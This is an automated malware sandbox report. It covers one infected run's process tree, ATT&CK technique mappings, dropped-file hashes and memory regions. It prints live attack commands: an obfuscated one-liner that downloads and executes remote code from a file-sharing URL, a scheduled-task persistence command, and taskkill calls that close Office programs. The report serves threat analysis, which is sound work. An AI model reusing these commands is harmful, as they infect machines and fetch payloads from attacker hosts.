- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4596
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 92 /tn calsendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/dp7ty5qaghujgmw/0Back.htm/file"""
  2⤵
  - Creates scheduled task(s)
  PID:900
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:568

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1512

C:\Windows\system32\wscript.exe
wscript C:\Users\Public\update.js
1⤵
- Process spawned unexpected child process
PID:4924

C:\ProgramData\ESETNONU.com
C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://www.mediafire.com/file/dyhisehpe01yoag/mainMOB.dll/file').GetResponse().GetResponseStream()).ReadToend());
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4420
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71E5.tmp" "c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\CSC868DADD53EA447D2B2C84465D8AF891.TMP"
    3⤵
    PID:3496
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 520
    3⤵
    - Program crash
    PID:1700
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:448
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:3312
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 520
    3⤵
    - Program crash
    PID:1480
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:4180
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 520
    3⤵
    - Program crash
    PID:3892
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:3500
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 520
    3⤵
    - Program crash
    PID:4596
- C:\ProgramData\hahahha.sdasd~txt
  "C:\ProgramData\hahahha.sdasd~txt"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3312 -ip 3312
1⤵
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1392 -ip 1392
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3500 -ip 3500
1⤵
PID:1032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1036 -ip 1036
1⤵
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4180 -ip 4180
1⤵
PID:4284

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ESETNONU.com

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\ProgramData\ddond.com

Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\ProgramData\ddond.com

Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\ProgramData\hahahha.sdasd~txt

Filesize
313KB

MD5
55f92c397772b28ca0cd110a47cdef66

SHA1
d848821c21e08eacfbd531d64039bdb02888667b

SHA256
f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

SHA512
afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

Download Submit
C:\ProgramData\hahahha.sdasd~txt

Filesize
313KB

MD5
55f92c397772b28ca0cd110a47cdef66

SHA1
d848821c21e08eacfbd531d64039bdb02888667b

SHA256
f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

SHA512
afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

Filesize
471B

MD5
e5ddf14c4003d401d5621396447b4498

SHA1
f408e84f24bfcb24c08999ebd83eab25ff7ce758

SHA256
03666af8ef38e7e30596f885e4d7b3fd5e89cb50199c05fddcb9706242c0d7d3

SHA512
b64823ff2466afa7760523363251fd8bde76fd2e38dbf07b60af37043f116bac6b34be4af30d31885419de68f9bad70e54b7f027b8c4d9700c5ae0ada7d1c402

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

Filesize
446B

MD5
7954b27e84bbf1c48ea652ab5bd31396

SHA1
4c9a2ba8cda6d135c9b0869d8c135746010b5a2f

SHA256
77dfdd0f20507d44fbcdd7196771784a84e9b102c8937cd195c56e603e412405

SHA512
c45cbae4ab7b7202f53f1df28e954a0aef7e7072f2561c2f0aa8e6a4a61f7d905dcc3863920f64682ab0685c192ef77c8234ea54bda7ea839b73ce894bcfc010

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CB3311F0-26B4-4485-B87F-4507267F8686

Filesize
142KB

MD5
cb2b24c6e966cd45143d0cfad596d946

SHA1
cb3c045c67f7e85c6600993a29a972da76a7213e

SHA256
3b5e1126c4f05d43b7e13ff4fbbf331448161181bf03b80f8d6222c990b9bb01

SHA512
47066bf6f759fac9d9585af1efb45530594bb78713f13799dafe8c30cb570613183e9ddc40aa1c8a888f98ca4a7807c2852a38697bd8ec93c31be3c1a536be5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
303KB

MD5
0e73fd13113616785de72a65790702a0

SHA1
004e11d2babe327942e19845c288bb42d885549f

SHA256
e22214c59a03a88a42a3e62270b9eff765e95e68b6f4cc03e1f0d0ee638b0266

SHA512
845cf0ecb6fb6b7ed73d9b21957f5a50d8fe8c62d3aa5211d43f24d47f1eb3a041bb84cc9373272c959c33ca0eba643dbec161319dbba7b3dec37ab241b32da3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES71E5.tmp

Filesize
1KB

MD5
0ff9d2c0f0650b2b3b4fa158515148eb

SHA1
3a66561ed1485cf9f9342e91a302bea9cb801060

SHA256
109a33e9b47803c56a24af3480a3a5a6abaebb1c48269abc6a5a9d763907f4c5

SHA512
478084918aee36b36f05acc42414e0904550540e531355b26905f2d9321c061995ac3198280d91878e237ff4754bf4bb4e5ac6e78dc14b6ad7696ae470550489

Download Submit
C:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.dll

Filesize
3KB

MD5
960a60140ea9fe4b1d18d5b07842715b

SHA1
df42771449aef60f939a9304e28359984038f5c5

SHA256
45ba550c0d67f539e789d7207236989ccca7b364c0c385aeff6e4fdd42e6676f

SHA512
6610cb1b4941a810b2988d47a419800991ed038eea25918cb4db8af8ec67810d771f7a302c786e1c37656e06fb80cca122c98f7951df9fc47b7f2a34f5c79f76

Download Submit
C:\Users\Public\update.js

Filesize
1KB

MD5
b2a6eb01401e4a297b4e97a197af123d

SHA1
fb7334316dd8b4eba10121b023e7e35d68a8e6a6

SHA256
8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

SHA512
b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

Download Submit
C:\Users\Public\update.js

Filesize
1KB

MD5
b2a6eb01401e4a297b4e97a197af123d

SHA1
fb7334316dd8b4eba10121b023e7e35d68a8e6a6

SHA256
8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

SHA512
b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\CSC868DADD53EA447D2B2C84465D8AF891.TMP

Filesize
652B

MD5
2981ef920001cf36acd21222e874dc44

SHA1
08b70b98001559e3d03dc8f49fc12521cb6935df

SHA256
c4e6045b69b667b942d441faab2a43b38d027ba98cb09056244b0d0d028efb89

SHA512
73921993d2f7583701b62197b5ba869d736b2a6da1fdf960207f42c2e7bd9abcd9691fa31da5654f315a83dc69c7bde4e40d3ebb852b638bdd5246c8991235f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.0.cs

Filesize
840B

MD5
268033bad46157d9949101dfdbd69f95

SHA1
14a7532c9470d058536ff71251abc55320dee08e

SHA256
17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

SHA512
09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bkrhnh0o\bkrhnh0o.cmdline

Filesize
369B

MD5
be7e26eac44c14e075eefa17bc9388f0

SHA1
c45394caa13ca909c5691ef2864ff03653cb4afa

SHA256
7430c968ed3ab1b9dc1dea3cd2b1fba5ec2fdd8445fb21f1a82d18cb6cc2edb6

SHA512
1382d15497cdde9fc1ce2a436f701f9cf05e52a86949498ae38bb8432288257c74cbd7396acfa081a64508902aaa826261fde354ed4de1d406bb42925311750c

Download Submit
memory/556-201-0x0000000000000000-mapping.dmp

Download
memory/556-209-0x000000001B942000-0x000000001B944000-memory.dmp

Filesize
8KB

Download
memory/556-208-0x0000000002EC0000-0x0000000002EFC000-memory.dmp

Filesize
240KB

Download
memory/556-207-0x000000001B940000-0x000000001B942000-memory.dmp

Filesize
8KB

Download
memory/556-204-0x0000000000C80000-0x0000000000CD4000-memory.dmp

Filesize
336KB

Download
memory/556-205-0x00007FFCDAEA0000-0x00007FFCDB961000-memory.dmp

Filesize
10.8MB

Download
memory/556-206-0x0000000001430000-0x0000000001442000-memory.dmp

Filesize
72KB

Download
memory/568-168-0x0000000000000000-mapping.dmp

Download
memory/900-165-0x0000000000000000-mapping.dmp

Download
memory/1036-181-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/1036-187-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/1036-182-0x0000000000405CE2-mapping.dmp

Download
memory/1392-198-0x0000000000405CE2-mapping.dmp

Download
memory/1440-162-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/1440-160-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/1440-161-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/1440-163-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/3312-185-0x0000000000405CE2-mapping.dmp

Download
memory/3372-135-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/3372-136-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/3372-137-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/3372-134-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/3372-138-0x00007FFCC98D0000-0x00007FFCC98E0000-memory.dmp

Filesize
64KB

Download
memory/3372-139-0x00007FFCC72A0000-0x00007FFCC72B0000-memory.dmp

Filesize
64KB

Download
memory/3496-177-0x0000000000000000-mapping.dmp

Download
memory/3500-194-0x0000000000405CE2-mapping.dmp

Download
memory/4180-190-0x0000000000405CE2-mapping.dmp

Download
memory/4216-140-0x0000000000000000-mapping.dmp

Download
memory/4420-169-0x0000016C610D0000-0x0000016C610F2000-memory.dmp

Filesize
136KB

Download
memory/4420-170-0x00007FFCDAEA0000-0x00007FFCDB961000-memory.dmp

Filesize
10.8MB

Download
memory/4420-171-0x0000016C610C6000-0x0000016C610C8000-memory.dmp

Filesize
8KB

Download
memory/4420-172-0x0000016C610C0000-0x0000016C610C2000-memory.dmp

Filesize
8KB

Download
memory/4420-173-0x0000016C610C3000-0x0000016C610C5000-memory.dmp

Filesize
8KB

Download
memory/4596-174-0x0000000000000000-mapping.dmp

Download
memory/4632-167-0x0000000000000000-mapping.dmp

Download
memory/5008-166-0x0000000000000000-mapping.dmp

Download